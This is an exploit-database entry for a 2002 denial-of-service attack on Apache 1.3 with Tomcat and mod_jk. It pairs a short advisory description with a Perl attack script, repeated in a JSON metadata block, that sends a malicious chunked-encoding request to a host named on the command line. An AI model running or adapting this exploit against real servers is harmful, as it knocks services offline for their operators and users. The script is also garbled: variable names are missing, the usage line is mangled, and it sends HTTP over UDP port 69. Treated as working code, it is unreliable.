Apache 1.3.x + Tomcat 4.0.x4.1.x mod_jk - Chunked Encoding Denial of Service
2002-12-04T00:00:00
ID EXPLOITPACK:516359F021E62D7AEA76911BA30D79DE Type exploitpack Reporter Sapient2003 Modified 2002-12-04T00:00:00
Description
Apache 1.3.x + Tomcat 4.0.x4.1.x mod_jk - Chunked Encoding Denial of Service
source: https://www.securityfocus.com/bid/6320/info
Apache Webserver and Tomcat are HTTP servers maintained and distributed by the Apache project. Apache Webserver and Tomcat are available for the Unix, Linux, and Microsoft Windows platforms.
It has been reported that a denial of service exists in Apache Webserver and Tomcat when mod_jk is used. Due to design problems in the module, a user submitting malicious requests to the Apache Webserver may cause desynchronization between Apache and Tomcat. This could be done through malicious chunked encoding requests.
#!/usr/bin/perl -w
use IO::Socket;
= "Apache 1.3.x, Tomcat 4.x Server, mod_jk 1.2 using Apache Jserv
Protocol 1.3";
unless (@ARGV == 1) {
print "\n By Sapient2003\n";
die "usage: -bash <host to exploit>\n";
}
print "\n By Sapient2003\n";
= "GET / HTTP/1.0\nHost: [0]\nTransfer-ENcoding:
Chunked\n53636f7474";
= IO::Socket::INET->new(
PeerAddr => [0],
PeerPort => 69,
Proto => "udp",
) or die "Can't find host [0]\n";
print ;
print "Attempted to exploit [0]\n";
close();
{"lastseen": "2020-04-01T19:04:03", "references": [], "description": "\nApache 1.3.x + Tomcat 4.0.x4.1.x mod_jk - Chunked Encoding Denial of Service", "edition": 1, "reporter": "Sapient2003", "exploitpack": {"type": "dos", "platform": "unix"}, "published": "2002-12-04T00:00:00", "title": "Apache 1.3.x + Tomcat 4.0.x4.1.x mod_jk - Chunked Encoding Denial of Service", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:03", "rev": 2}, "score": {"value": -0.2, "vector": "NONE", "modified": "2020-04-01T19:04:03", "rev": 2}, "vulnersScore": -0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2002-12-04T00:00:00", "id": "EXPLOITPACK:516359F021E62D7AEA76911BA30D79DE", "href": "", "viewCount": 1, "sourceData": "source: https://www.securityfocus.com/bid/6320/info\n\nApache Webserver and Tomcat are HTTP servers maintained and distributed by the Apache project. Apache Webserver and Tomcat are available for the Unix, Linux, and Microsoft Windows platforms.\n\nIt has been reported that a denial of service exists in Apache Webserver and Tomcat when mod_jk is used. Due to design problems in the module, a user submitting malicious requests to the Apache Webserver may cause desynchronization between Apache and Tomcat. This could be done through malicious chunked encoding requests.\n\n#!/usr/bin/perl -w\n\nuse IO::Socket;\n\n = \"Apache 1.3.x, Tomcat 4.x Server, mod_jk 1.2 using Apache Jserv\nProtocol 1.3\";\n\nunless (@ARGV == 1) {\n print \"\\n By Sapient2003\\n\";\n die \"usage: -bash <host to exploit>\\n\";\n}\nprint \"\\n By Sapient2003\\n\";\n\n = \"GET / HTTP/1.0\\nHost: [0]\\nTransfer-ENcoding:\nChunked\\n53636f7474\";\n\n = IO::Socket::INET->new(\n PeerAddr => [0],\n PeerPort => 69,\n Proto => \"udp\",\n) or die \"Can't find host [0]\\n\";\nprint ;\nprint \"Attempted to exploit [0]\\n\";\nclose();", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}